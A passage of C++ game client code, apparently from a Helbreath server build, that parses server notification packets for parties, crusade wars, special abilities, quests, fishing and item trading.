					wsprintf(G_cTxt, NOTIFY_MSG_HANDLER1, cTxt);
					AddEventList(G_cTxt, 10);
				}

				m_iTotalPartyMember++;
				for (i = 0; i < DEF_MAXPARTYMEMBERS; i++)
				if (strlen(m_stPartyMemberNameList[i].cName) == 0) {
					ZeroMemory(m_stPartyMemberNameList[i].cName, sizeof(m_stPartyMemberNameList[i].cName));
					memcpy(m_stPartyMemberNameList[i].cName, cTxt, 10);
					ActualizarParty = TRUE;
					goto NMH_LOOPBREAK1;
				}
NMH_LOOPBREAK1:;
				break;

			case 2: //
				break;
			}
			break;

		case 5: //
			m_iTotalPartyMember = NULL;
			for (i = 0; i < DEF_MAXPARTYMEMBERS; i++) 
			{
				ZeroMemory(m_stPartyMemberNameList[i].cName, sizeof(m_stPartyMemberNameList[i].cName));
			}
			m_iTotalPartyMember = sV3;
			for (i = 1; i <= sV3; i++) {
				ZeroMemory(m_stPartyMemberNameList[i-1].cName, sizeof(m_stPartyMemberNameList[i-1].cName));
				memcpy(m_stPartyMemberNameList[i-1].cName, cp, 10);
				cp += 11;
			}
			ActualizarParty = TRUE;
			break;

		default:
			sp  = (short *)cp;
			sV4 = *sp;
			cp += 2;
			break;

		case 6:
			ZeroMemory(cTxt, sizeof(cTxt));
			memcpy(cTxt, cp, 10);
			cp += 10;

			switch (sV2) {
			case 0: //
				EnableDialogBox(32, NULL, NULL, NULL);
				m_stDialogBoxInfo[32].cMode = 7;
				ActualizarParty = TRUE;
				break;

			case 1: //
				if (strcmp(cTxt, m_cPlayerName) == 0) {
					m_iPartyStatus = 0;
					EnableDialogBox(32, NULL, NULL, NULL);
					m_stDialogBoxInfo[32].cMode = 6;
					ActualizarParty = TRUE;
				}
				else {
					wsprintf(G_cTxt, NOTIFY_MSG_HANDLER2 , cTxt);
					AddEventList(G_cTxt, 10);
					ActualizarParty = TRUE;
				}
				for (i = 0; i < DEF_MAXPARTYMEMBERS; i++)
				if (strcmp(m_stPartyMemberNameList[i].cName, cTxt) == 0) {
					ZeroMemory(m_stPartyMemberNameList[i].cName, sizeof(m_stPartyMemberNameList[i].cName));
					m_iTotalPartyMember--;
					ActualizarParty = TRUE;
					goto NMH_LOOPBREAK2;
				}
NMH_LOOPBREAK2:;
				break;
			}
			break;

		case 7: //
			EnableDialogBox(32, NULL, NULL, NULL);
			m_stDialogBoxInfo[32].cMode = 9;
			ActualizarParty = TRUE;
			break;

		case 8: //
			m_iPartyStatus = 0;
			m_iTotalPartyMember = NULL;
			for (i = 0; i < DEF_MAXPARTYMEMBERS; i++) 
			{
				ZeroMemory(m_stPartyMemberNameList[i].cName, sizeof(m_stPartyMemberNameList[i].cName));
			}
			ActualizarParty = TRUE;
			break;

		}
		break;

	case DEF_NOTIFY_CANNOTCONSTRUCT:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);

		sp  = (short *)cp;
		sV1 = *sp;
		cp += 2;

		CannotConstruct(sV1);
		PlaySound('E', 25, 0, 0);
		break;

	case DEF_NOTIFY_TCLOC:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);

		sp  = (short *)cp;
		m_iTeleportLocX = *sp;
		cp += 2;

		sp  = (short *)cp;
		m_iTeleportLocY = *sp;
		cp += 2;

		ZeroMemory(m_cTeleportMapName, sizeof(m_cTeleportMapName));
		memcpy(m_cTeleportMapName, cp, 10);
		cp += 10;

		sp  = (short *)cp;
		m_iConstructLocX = *sp;
		cp += 2;

		sp  = (short *)cp;
		m_iConstructLocY = *sp;
		cp += 2;

		ZeroMemory(m_cConstructMapName, sizeof(m_cConstructMapName));
		memcpy(m_cConstructMapName, cp, 10);
		cp += 10;
		break;

	case DEF_NOTIFY_CONSTRUCTIONPOINT:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);

		sp  = (short *)cp;
		sV1 = *sp;
		cp += 2;

		sp  = (short *)cp;
		sV2 = *sp;
		cp += 2;

		sp  = (short *)cp;
		sV3 = *sp;
		cp += 2;

		if (sV3 == 0) {
			if ((sV1 > m_iConstructionPoint) && (sV2 > m_iWarContribution)) {
				wsprintf(G_cTxt, "%s +%d, %s +%d", m_pGameMsgList[13]->m_pMsg, (sV1 - m_iConstructionPoint), m_pGameMsgList[21]->m_pMsg, (sV2 - m_iWarContribution));
				SetTopMsg(G_cTxt, 5);
				PlaySound('E', 23, 0, 0);
			}

			if ((sV1 > m_iConstructionPoint) && (sV2 == m_iWarContribution)) {
				if (m_iCrusadeDuty == 3) {
					wsprintf(G_cTxt, "%s +%d", m_pGameMsgList[13]->m_pMsg, sV1 - m_iConstructionPoint);
					SetTopMsg(G_cTxt, 5);
					PlaySound('E', 23, 0, 0);
				}
			}

			if ((sV1 == m_iConstructionPoint) && (sV2 > m_iWarContribution)) {
				wsprintf(G_cTxt, "%s +%d", m_pGameMsgList[21]->m_pMsg, sV2 - m_iWarContribution);
				SetTopMsg(G_cTxt, 5);
				PlaySound('E', 23, 0, 0);
			}

			if (sV1 < m_iConstructionPoint) {
				if (m_iCrusadeDuty == 3) {
					wsprintf(G_cTxt, "%s -%d", m_pGameMsgList[13]->m_pMsg, m_iConstructionPoint - sV1);
					SetTopMsg(G_cTxt, 5);
					PlaySound('E', 25, 0, 0);
				}
			}

			if (sV2 < m_iWarContribution) {
				wsprintf(G_cTxt, "%s -%d", m_pGameMsgList[21]->m_pMsg, m_iWarContribution - sV2);
				SetTopMsg(G_cTxt, 5);
				PlaySound('E', 24, 0, 0);
			}
		}

		m_iConstructionPoint = sV1;
		m_iWarContribution   = sV2;
		break;

	case DEF_NOTIFY_NOMORECRUSADESTRUCTURE:
		SetTopMsg(m_pGameMsgList[12]->m_pMsg, 5);
		PlaySound('E', 25, 0, 0);
		break;

	case DEF_NOTIFY_GRANDMAGICRESULT:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);

		wp  = (WORD *)cp;
		sV1 = *wp;
		cp += 2;

		wp  = (WORD *)cp;
		sV2 = *wp;
		cp += 2;

		wp  = (WORD *)cp;
		sV3 = *wp;
		cp += 2;

		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, cp, 10);
		cp += 10;

		wp  = (WORD *)cp;
		sV4 = *wp;
		cp += 2;

		wp  = (WORD *)cp;
		sV5 = *wp;  //
		cp += 2;

		if (sV5  > 0 ) {
			wp  = (WORD *)cp;
			sV6 = *wp;
			cp += 2;
			sV5-- ;
		}
		else sV6 = 0 ;

		if ( sV5  > 0 ) {
			wp  = (WORD *)cp;
			sV7 = *wp;
			cp += 2;
			sV5-- ;
		}
		else sV7 = 0 ;

		if ( sV5  > 0 ) {
			wp  = (WORD *)cp;
			sV8 = *wp;
			cp += 2;
			sV5-- ;
		}
		else sV8 = 0 ;

		if ( sV5  > 0 ) {
			wp  = (WORD *)cp;
			sV9 = *wp;
			cp += 2;
			sV5-- ;
		}
		else sV9 = 0 ;

		GrandMagicResult(cTxt, sV1, sV2, sV3, sV4, sV6, sV7, sV8, sV9);
		break;

	case DEF_NOTIFY_METEORSTRIKECOMING:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		wp  = (WORD *)cp;
		sV1 = *wp;
		cp += 2;
		MeteorStrikeComing(sV1);
		PlaySound('E', 25, 0, 0);
		break;

	case DEF_NOTIFY_METEORSTRIKEHIT:
		SetTopMsg(m_pGameMsgList[17]->m_pMsg, 5);
		//StartMeteorStrikeEffect
#ifdef RES_HIGH
		for( i=0 ; i<36 ; i++ ) bAddNewEffect(60, m_sViewPointX +(rand() % 800), m_sViewPointY +(rand() % 600), NULL, NULL, -(rand() % 80));
#else
		for( i=0 ; i<36 ; i++ ) bAddNewEffect(60, m_sViewPointX +(rand() % 640), m_sViewPointY +(rand() % 480), NULL, NULL, -(rand() % 80));
#endif
		break;

	case DEF_NOTIFY_MAPSTATUSNEXT:
		AddMapStatusInfo(pData, FALSE);
		break;

	case DEF_NOTIFY_MAPSTATUSLAST:
		AddMapStatusInfo(pData, TRUE);
		break;

	case DEF_NOTIFY_LOCKEDMAP:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;
		sV1 = *sp;
		cp += 2;

		ZeroMemory(cTemp, sizeof(cTemp));
		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, cp, 10);
		cp += 10;

		GetOfficialMapName(cTxt, cTemp);
		wsprintf( G_cTxt, NOTIFY_MSG_HANDLER3, sV1, cTemp );
		SetTopMsg(G_cTxt, 10);
		PlaySound('E', 25, 0, 0);
		break;

	case DEF_NOTIFY_CRUSADE: // Crusade msg
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		iV1 = *ip; // Crusademode
		cp += 4;
		ip = (int *)cp;
		iV2 = *ip; // crusade duty
		cp += 4;
		ip = (int *)cp;
		iV3 = *ip;
		cp += 4;
		ip = (int *)cp;
		iV4 = *ip;
		cp += 4;
		if (m_bIsCrusadeMode == FALSE)
		{	if (iV1 != 0) // begin crusade
			{	m_bIsCrusadeMode = TRUE;
				m_iCrusadeDuty = iV2;
				if( (m_iCrusadeDuty != 3) && (m_bCitizen==TRUE) )
					_RequestMapStatus("middleland", 3);
				if (m_iCrusadeDuty != NULL)
					 EnableDialogBox(33, 2, iV2, NULL);
				else EnableDialogBox(33, 1, NULL, NULL);
				if( m_bCitizen == FALSE ) EnableDialogBox(18, 800, NULL, NULL);
				else if( m_bAresden == TRUE ) EnableDialogBox(18, 801, NULL, NULL);
				else if( m_bAresden == FALSE ) EnableDialogBox(18, 802, NULL, NULL);
				if (m_bCitizen == FALSE) SetTopMsg(NOTIFY_MSG_CRUSADESTART_NONE, 10);
				else SetTopMsg(m_pGameMsgList[9]->m_pMsg, 10);
				PlaySound('E', 25, 0, 0);
			}
			if (iV3 != 0) // Crusade finished, show XP result screen
			{	CrusadeContributionResult(iV3);
			}
			if (iV4 == -1) // The crusade you played in was finished.
			{	CrusadeContributionResult(0); // You connect in this crusade, but did not connect after previous one => no XP....
			}
		}else
		{	if (iV1 == 0) // crusade finished show result (1st result: winner)
			{	m_bIsCrusadeMode = FALSE;
				m_iCrusadeDuty   = NULL;
				CrusadeWarResult(iV4);
				SetTopMsg(m_pGameMsgList[57]->m_pMsg, 8);
			}else
			{	if (m_iCrusadeDuty != iV2)
				{	m_iCrusadeDuty = iV2;
					EnableDialogBox(33, 2, iV2, NULL);
					PlaySound('E', 25, 0, 0);
			}	}
			if (iV4 == -1)
			{	CrusadeContributionResult(0); // You connect in this crusade, but did not connect after previous one => no XP....
		}	}
		break;

	case DEF_NOTIFY_SPECIALABILITYSTATUS:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;
		sV1 = *sp;
		cp += 2;
		sp = (short *)cp;
		sV2 = *sp;
		cp += 2;
		sp = (short *)cp;
		sV3 = *sp;
		cp += 2;
		if (sV1 == 1) // Use SA
		{	PlaySound('E', 35, 0);
			AddEventList(NOTIFY_MSG_HANDLER4, 10); // "Use special ability!"
			switch (sV2) {
			case 1: wsprintf(G_cTxt, NOTIFY_MSG_HANDLER5,sV3); break;//"You are untouchable for %d seconds!"
			case 2: wsprintf(G_cTxt, NOTIFY_MSG_HANDLER6, sV3); break;//"
			case 3: wsprintf(G_cTxt, NOTIFY_MSG_HANDLER7, sV3); break;//"
			case 4: wsprintf(G_cTxt, NOTIFY_MSG_HANDLER8, sV3); break;//"
			case 5: wsprintf(G_cTxt, NOTIFY_MSG_HANDLER9, sV3); break;//"
			case 50:wsprintf(G_cTxt, NOTIFY_MSG_HANDLER10, sV3); break;//"
			case 51:wsprintf(G_cTxt, NOTIFY_MSG_HANDLER11, sV3); break;//"
			case 52:wsprintf(G_cTxt, NOTIFY_MSG_HANDLER12, sV3); break;//"
			case 55: // Spell effect
				if (sV3 >90)
					wsprintf(G_cTxt, "You cast a powerfull incantation, you can't use it again before %d minutes.", sV3/60);
				else
					wsprintf(G_cTxt, "You cast a powerfull incantation, you can't use it again before %d seconds.", sV3);
				break;
			}
			AddEventList(G_cTxt, 10);
		}else if (sV1 == 2) // Finished using
		{	if (m_iSpecialAbilityType != (int)sV2)
			{	PlaySound('E', 34, 0);
				AddEventList(NOTIFY_MSG_HANDLER13, 10);//"Special ability has been set!"
				if (sV3 >= 60)
				{	switch (sV2) {
					case 1: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER14, sV3/60); AddEventList(G_cTxt, 10); break;//"Ability that decreases enemy's HP by 50%: Can use after %dMin"
					case 2: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER15, sV3/60); AddEventList(G_cTxt, 10); break;//"
					case 3: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER16, sV3/60); AddEventList(G_cTxt, 10); break;//"
					case 4: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER17, sV3/60); AddEventList(G_cTxt, 10); break;//"
					case 5: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER18, sV3/60); AddEventList(G_cTxt, 10); break;//"
					case 50:wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER19, sV3/60); AddEventList(G_cTxt, 10); break;//"
					case 51:wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER20, sV3/60); AddEventList(G_cTxt, 10); break;//"
					case 52:wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER21, sV3/60); AddEventList(G_cTxt, 10); break;//"
					}
				}else
				{	switch (sV2) {
					case 1: wsprintf(G_cTxt, NOTIFY_MSG_HANDLER22, sV3); AddEventList(G_cTxt, 10); break;//"
					case 2: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER23, sV3); AddEventList(G_cTxt, 10); break;//"
					case 3: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER24, sV3); AddEventList(G_cTxt, 10); break;//"
					case 4: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER25, sV3); AddEventList(G_cTxt, 10); break;//"
					case 5: wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER26, sV3); AddEventList(G_cTxt, 10); break;//"
					case 50:wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER27, sV3); AddEventList(G_cTxt, 10); break;//"
					case 51:wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER28, sV3); AddEventList(G_cTxt, 10); break;//"
					case 52:wsprintf(G_cTxt,  NOTIFY_MSG_HANDLER29, sV3); AddEventList(G_cTxt, 10); break;//""Ability that makes character untouchable: Can use after %dSec"
			}	}	}
			m_iSpecialAbilityType = (int)sV2;
			m_dwSpecialAbilitySettingTime = dwTime;
			m_iSpecialAbilityTimeLeftSec  = (int)sV3;
		}else if (sV1 == 3)  // End of using time
		{	m_bIsSpecialAbilityEnabled = FALSE;
			m_dwSpecialAbilitySettingTime = dwTime;
			if (sV3 == 0)
			{	m_iSpecialAbilityTimeLeftSec  = 1200;
				AddEventList(NOTIFY_MSG_HANDLER30, 10);//"Special ability has run out! Will be available in 20 minutes."
			}else
			{	m_iSpecialAbilityTimeLeftSec  = (int)sV3;
				if (sV3 >90)
					 wsprintf(G_cTxt, "Special ability has run out! Will be available in %d minutes." , sV3/60);
				else wsprintf(G_cTxt, "Special ability has run out! Will be available in %d seconds." , sV3);
				AddEventList(G_cTxt, 10);
			}
		}else if (sV1 == 4) // Unequiped the SA item
		{	AddEventList(NOTIFY_MSG_HANDLER31, 10);//"Special ability has been released."
			m_iSpecialAbilityType = 0;
		}else if (sV1 == 5) // Angel
		{	PlaySound('E', 52, 0); // Angel
		}
		break;

	case DEF_NOTIFY_SPECIALABILITYENABLED:
		if (m_bIsSpecialAbilityEnabled == FALSE) {
			PlaySound('E', 30, 5);
			AddEventList(NOTIFY_MSG_HANDLER32, 10);//"
		}
		m_bIsSpecialAbilityEnabled = TRUE;
		break;

	case DEF_NOTIFY_ENERGYSPHEREGOALIN:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;
		sV1 = *sp;
		cp += 2;
		sp = (short *)cp;
		sV2 = *sp;
		cp += 2;
		sp = (short *)cp;
		sV3 = *sp;
		cp += 2;
		ZeroMemory(cTxt, sizeof(cTxt));
		memcpy(cTxt, cp, 20);

		if (sV2 == sV3)
		{	PlaySound('E', 24, 0);
			if (strcmp(cTxt, m_cPlayerName) == 0)
			{	AddEventList(NOTIFY_MSG_HANDLER33, 10);//You pushed energy sphere to enemy's energy portal! Contribution point will be decreased by 10 points."
				m_iContribution += sV1; // fixed, server must match...
				m_iContributionPrice = 0;
				if (m_iContribution < 0) m_iContribution = 0;
			}
			else {
				ZeroMemory(G_cTxt, sizeof(G_cTxt));
				if( m_bAresden == TRUE ) wsprintf(G_cTxt, NOTIFY_MSG_HANDLER34, cTxt);//"%s(Aresden) pushed energy sphere to enemy's portal!!..."
				else if (m_bAresden == FALSE) wsprintf(G_cTxt, NOTIFY_MSG_HANDLER34_ELV, cTxt);//"%s(Elvine) pushed energy sphere to enemy's portal!!..."
				AddEventList(G_cTxt, 10);
			}
		}else
		{	PlaySound('E', 23, 0);
			if (strcmp(cTxt, m_cPlayerName) == 0)
			{	switch (m_sPlayerType) {
				case 1:
				case 2:
				case 3:	PlaySound('C', 21, 0); break;
				case 4:
				case 5:
				case 6:	PlaySound('C', 22, 0); break;
				}
				AddEventList(NOTIFY_MSG_HANDLER35, 10);//"Congulaturations! You brought energy sphere to energy portal and earned experience and prize gold!"

				m_iContribution += 5;
				if (m_iContribution < 0) m_iContribution = 0;
			}else
			{	ZeroMemory(G_cTxt, sizeof(G_cTxt));
				if (sV3 == 1)
				{	wsprintf(G_cTxt, NOTIFY_MSG_HANDLER36, cTxt);//"Elvine %s : Goal in!"
					AddEventList(G_cTxt, 10);
				}else if (sV3 == 2)
				{	wsprintf(G_cTxt, NOTIFY_MSG_HANDLER37, cTxt);//"Aresden %s : Goal in!"
					AddEventList(G_cTxt, 10);
		}	}	}
		break;

	case DEF_NOTIFY_ENERGYSPHERECREATED:
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;
		sV1 = *sp;
		cp += 2;
		sp = (short *)cp;
		sV2 = *sp;
		cp += 2;
		ZeroMemory(G_cTxt, sizeof(G_cTxt));
		wsprintf(G_cTxt, NOTIFY_MSG_HANDLER38, sV1, sV2);//"Energy sphere was dropped in (%d, %d) of middleland!"
		AddEventList(G_cTxt, 10);
		AddEventList(NOTIFY_MSG_HANDLER39, 10);//"A player who pushed energy sphere to the energy portal of his city will earn many Exp and Contribution."
		break;

	case DEF_NOTIFY_QUERY_JOINPARTY:
		EnableDialogBox(32, NULL, NULL, NULL);
		m_stDialogBoxInfo[32].cMode = 1;
		ZeroMemory(m_stDialogBoxInfo[32].cStr, sizeof(m_stDialogBoxInfo[32].cStr));
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		strcpy(m_stDialogBoxInfo[32].cStr, cp);
		break;

	case DEF_NOTIFY_RESPONSE_CREATENEWPARTY:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;

		if ((BOOL)*sp == TRUE)
		{	m_stDialogBoxInfo[32].cMode = 2;
		}else
		{	m_stDialogBoxInfo[32].cMode = 3;
		}
		break;

	//50Cent - HP Bar
	case DEF_SEND_NPCHP:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
        ip = (int *)cp;
        iNpcHP = *ip;
		cp += 4;
		ip = (int *)cp;
		iNpcMaxHP = *ip;
		cp += 4;
        break;

	case DEF_NOTIFY_DAMAGEMOVE:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;
		m_sDamageMove = *sp;
		cp += 2;
		sp = (short *)cp;
		m_sDamageMoveAmount = *sp;
		cp += 2;
		break;

	case DEF_NOTIFY_OBSERVERMODE:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;
		if (*sp == 1)
		{	AddEventList(NOTIFY_MSG_HANDLER40);//"Observer Mode On. Press 'SHIFT + ESC' to Log Out..."
			m_bIsObserverMode = TRUE;
			m_dwObserverCamTime = timeGetTime();
			char cName[12];
			ZeroMemory(cName, sizeof(cName));
			memcpy(cName, m_cPlayerName, 10);
			m_pMapData->bSetOwner(m_sPlayerObjectID, -1, -1, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, cName, NULL, NULL, NULL, NULL);
		}else
		{	AddEventList(NOTIFY_MSG_HANDLER41);//"Observer Mode Off"
			m_bIsObserverMode = FALSE;
			m_pMapData->bSetOwner(m_sPlayerObjectID, m_sPlayerX, m_sPlayerY, m_sPlayerType, m_cPlayerDir, m_sPlayerAppr1, m_sPlayerAppr2, m_sPlayerAppr3, m_sPlayerAppr4, m_iPlayerApprColor, m_iPlayerStatus, m_cPlayerName, DEF_OBJECTSTOP, NULL, NULL, NULL);
		}
		break;

	case DEF_NOTIFY_BUILDITEMSUCCESS:
		DisableDialogBox(26);
		cp = (char *)(pData	+ DEF_INDEX2_MSGTYPE + 2);
		sp = (short *)cp;
		sV1 = *sp;
		cp += 2;
		sp = (short *)cp;
		sV2 = *sp;
		cp += 2;
		if (sV1 < 10000)
		{	EnableDialogBox(26, 6, 1, sV1, NULL);
			m_stDialogBoxInfo[26].sV1 = sV2;
		}else
		{	EnableDialogBox(26, 6, 1, -1*(sV1 - 10000), NULL);
			m_stDialogBoxInfo[26].sV1 = sV2;
		}
		AddEventList(NOTIFY_MSG_HANDLER42, 10);
		PlaySound('E', 23, 5);
		switch (m_sPlayerType) {
		case 1:
		case 2:
		case 3:
			PlaySound('C', 21, 0);
			break;

		case 4:
		case 5:
		case 6:
			PlaySound('C', 22, 0);
			break;
		}
		break;

	case DEF_NOTIFY_BUILDITEMFAIL:
		DisableDialogBox(26);
		EnableDialogBox(26, 6, 0, NULL);
		AddEventList(NOTIFY_MSG_HANDLER43, 10);
		PlaySound('E', 24, 5);
		break;

	case DEF_NOTIFY_QUESTREWARD:
		NotifyMsg_QuestReward(pData);
		break;

	case DEF_NOTIFY_QUESTCOMPLETED:
		m_stQuest.bIsQuestCompleted = TRUE;
		DisableDialogBox(28);
		EnableDialogBox(28, 1, NULL, NULL);
		switch (m_sPlayerType) {
		case 1:
		case 2:
		case 3:	PlaySound('C', 21, 0); break;
		case 4:
		case 5:
		case 6:	PlaySound('C', 22, 0); break;
		}
		PlaySound('E', 23, 0);
		AddEventList(NOTIFY_MSG_HANDLER44, 10);
		break;

	case DEF_NOTIFY_QUESTABORTED:
		m_stQuest.sQuestType = NULL;
		DisableDialogBox(28);
		EnableDialogBox(28, 2, NULL, NULL);
		break;

	case DEF_NOTIFY_QUESTCONTENTS:
		NotifyMsg_QuestContents(pData);
		break;

	case DEF_NOTIFY_ITEMCOLORCHANGE:
		NotifyMsg_ItemColorChange(pData);
		break;

	case DEF_NOTIFY_DROPITEMFIN_COUNTCHANGED:
		NotifyMsg_DropItemFin_CountChanged(pData);
		break;

	case DEF_NOTIFY_CANNOTGIVEITEM:
		NotifyMsg_CannotGiveItem(pData);
		break;

	case DEF_NOTIFY_GIVEITEMFIN_COUNTCHANGED:
		NotifyMsg_GiveItemFin_CountChanged(pData);
		break;

	case DEF_NOTIFY_EXCHANGEITEMCOMPLETE:
		AddEventList(NOTIFYMSG_EXCHANGEITEM_COMPLETE1, 10);
		DisableDialogBox(27);
		//Snoopy: MultiTrade
		DisableDialogBox(41);
		PlaySound('E', 23, 5);
		break;

	case DEF_NOTIFY_CANCELEXCHANGEITEM:
		PlaySound('E', 24, 5);
		AddEventList(NOTIFYMSG_CANCEL_EXCHANGEITEM1, 10);
		AddEventList(NOTIFYMSG_CANCEL_EXCHANGEITEM2, 10);
		//Snoopy: MultiTrade
		DisableDialogBox(41);
		DisableDialogBox(27);
		break;

	case DEF_NOTIFY_SETEXCHANGEITEM:
		NotifyMsg_SetExchangeItem(pData);
		break;

	case DEF_NOTIFY_OPENEXCHANGEWINDOW:
		NotifyMsg_OpenExchageWindow(pData);
		break;

	case DEF_NOTIFY_NOTFLAGSPOT:
		AddEventList(NOTIFY_MSG_HANDLER45, 10);
		break;

	case DEF_NOTIFY_ITEMPOSLIST:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		for (i = 0; i < DEF_MAXITEMS; i++) {
			sp = (short *)cp;
			sX = *sp;
			cp += 2;
			sp = (short *)cp;
			sY = *sp;
			cp += 2;
			if (m_pItemList[i] != NULL) {
				if (sY < -10) sY = -10;
				if (sX < 0)   sX = 0;
				if (sX > 170) sX = 170;
				if (sY > 95)  sY = 95;

				m_pItemList[i]->m_sX = sX;
				m_pItemList[i]->m_sY = sY;
			}
		}
		break;

	case DEF_NOTIFY_ENEMYKILLS:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		m_iEnemyKillCount = *ip;
		break;

	case DEF_NOTIFY_DGKILL: // MORLA 2.2 - Recibe la informacion de un Kill en Deathmach Game
		NotifyMsg_DGKill(pData);
		break;

	case DEF_NOTIFY_REPDGDEATHS: // MORLA 2.4 - Recibe la info de REP, Death, y DGPoints
		NotifyMsg_REPDGDEATHS(pData);
		break;

	case DEF_NOTIFY_DOUBLEKILL:
		PlaySound('E', 54, 0, 0);
		dwTimeLastMsg = (timeGetTime()+2*1000);
		iKillAnnouncer = 1;
		break;
		
	case DEF_NOTIFY_MONSTERKILL:
		PlaySound('E', 57, 0, 0);
		dwTimeLastMsg = (timeGetTime()+2*1000);
		iKillAnnouncer = 2;
		break;

	case DEF_NOTIFY_KILLSPRING:
		PlaySound('E', 56, 0, 0);
		dwTimeLastMsg = (timeGetTime()+2*1000);
		iKillAnnouncer = 3;
		break;

	case DEF_NOTIFY_HOLYSHIT:
		PlaySound('E', 55, 0, 0);
		dwTimeLastMsg = (timeGetTime()+2*1000);
		iKillAnnouncer = 4;
		break;

	case DEF_NOTIFY_DOWNSKILLINDEXSET:
		NotifyMsg_DownSkillIndexSet(pData);
		break;

	case DEF_NOTIFY_ADMINIFO:
		NotifyMsg_AdminInfo(pData);
		break;

	case DEF_NOTIFY_NPCTALK:
		NpcTalkHandler(pData);
		break;

	case DEF_NOTIFY_PORTIONSUCCESS:
		AddEventList(NOTIFY_MSG_HANDLER46, 10);
		break;

	case DEF_NOTIFY_PORTIONFAIL:
		AddEventList(NOTIFY_MSG_HANDLER47, 10);
		break;

	case DEF_NOTIFY_LOWPORTIONSKILL:
		AddEventList(NOTIFY_MSG_HANDLER48, 10);
		break;

	case DEF_NOTIFY_NOMATCHINGPORTION:
		AddEventList(NOTIFY_MSG_HANDLER49, 10);
		break;

	case DEF_NOTIFY_SUPERATTACKLEFT:
		sp = (short *)(pData + DEF_INDEX2_MSGTYPE + 2);
		m_iSuperAttackLeft = (int)*sp;
		break;

	case DEF_NOTIFY_SAFEATTACKMODE:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		switch (*cp) {
		case 1:
			if(!m_bIsSafeAttackMode) AddEventList(NOTIFY_MSG_HANDLER50, 10);//"
			m_bIsSafeAttackMode = TRUE;
			break;
		case 0:
			if(m_bIsSafeAttackMode) AddEventList(NOTIFY_MSG_HANDLER51, 10);//"
			m_bIsSafeAttackMode = FALSE;
			break;
		}
		break;

	case DEF_NOTIFY_IPACCOUNTINFO:
		ZeroMemory(cTemp, sizeof(cTemp));
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		strcpy(cTemp, cp);
		AddEventList(cTemp);
		break;

	case DEF_NOTIFY_REWARDGOLD:
		dwp = (DWORD *)(pData + DEF_INDEX2_MSGTYPE + 2);
		m_iRewardGold = *dwp;
		break;

	case DEF_NOTIFY_SERVERSHUTDOWN:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		if (m_bIsDialogEnabled[25] == FALSE)
			 EnableDialogBox(25, *cp, NULL, NULL);
		else m_stDialogBoxInfo[25].cMode = *cp;
		PlaySound('E', 27, NULL);
		break;

	case DEF_NOTIFY_GLOBALATTACKMODE:
		NotifyMsg_GlobalAttackMode(pData);
		break;

	case DEF_NOTIFY_WHETHERCHANGE:
		NotifyMsg_WhetherChange(pData);
		break;

	case DEF_NOTIFY_FISHCANCELED:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		wp = (WORD *)cp;
		switch (*wp) {
		case NULL:
			AddEventList(NOTIFY_MSG_HANDLER52, 10);
			DisableDialogBox(24);
			break;

		case 1:
			AddEventList(NOTIFY_MSG_HANDLER53, 10);
			DisableDialogBox(24);
			break;

		case 2:
			AddEventList(NOTIFY_MSG_HANDLER54, 10);
			DisableDialogBox(24);
			break;
		}
		break;

	case DEF_NOTIFY_FISHSUCCESS:
		AddEventList(NOTIFY_MSG_HANDLER55, 10);
		PlaySound('E', 23, 5);
		PlaySound('E', 17, 5);
		switch (m_sPlayerType) {
		case 1:
		case 2:
		case 3:
			PlaySound('C', 21, 0);
			break;

		case 4:
		case 5:
		case 6:
			PlaySound('C', 22, 0);
			break;
		}
		break;

	case DEF_NOTIFY_FISHFAIL:
		AddEventList(NOTIFY_MSG_HANDLER56, 10);
		PlaySound('E', 24, 5);
		break;

	case DEF_NOTIFY_FISHCHANCE:
		NotifyMsg_FishChance(pData);
		break;

	case DEF_NOTIFY_EVENTFISHMODE:
		NotifyMsg_EventFishMode(pData);
		break;

	case DEF_NOTIFY_NOTICEMSG:
		NotifyMsg_NoticeMsg(pData);
		break;

	case DEF_NOTIFY_RATINGPLAYER:
		NotifyMsg_RatingPlayer(pData);
		break;

	case DEF_NOTIFY_CANNOTRATING:
		NotifyMsg_CannotRating(pData);
		break;

	case DEF_NOTIFY_ADMINUSERLEVELLOW:
